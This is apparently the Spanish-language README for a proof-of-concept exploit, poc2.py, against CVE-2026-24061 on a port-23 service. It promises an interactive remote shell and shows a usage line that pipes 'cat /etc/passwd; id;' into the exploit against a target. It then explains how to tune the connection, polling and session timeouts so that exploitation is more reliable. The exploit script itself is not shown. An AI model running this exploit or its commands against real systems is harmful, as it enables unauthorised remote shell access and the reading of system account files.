
Prueba de concepto del exploit para CVE-2026-24061 que proporciona una sesión de shell remota interactiva con tiempos de espera configurables para una explotación fiable.
echo "cat /etc/passwd; id;" | python poc2.py TARGET 23
python self.connection.settimeout(10) # <-- Tiempo de espera de conexión ajustable Propósito: Controla cuánto tiempo esperar por la conexión TCP inicial al objetivo Valores recomendados:
Redes rápidas: 5-10 segundos
Redes lentas/poco fiables: 15-30 segundos
Predeterminado: 10 segundos
python ready_to_read, _, _ = select.select(read_fds, [], [], 5.0) # <-- Tiempo de espera de sondeo ajustable Propósito: Controla con qué frecuencia comprobar si hay datos entrantes cuando está inactivo Valores recomendados:
Sesiones interactivas: 1.0-2.0 segundos
Automatización con scripts: 0.1-0.5 segundos
Predeterminado: 5.0 segundos
python session_timeout = 120 # <-- Duración total de sesión ajustable Propósito: Duración máxima para toda la sesión de explotación Valores recomendados:
Comandos rápidos: 30-60 segundos
Transferencias de archivos/operaciones largas: 300-600 segundos
Predeterminado: 120 segundos (2 minutos)
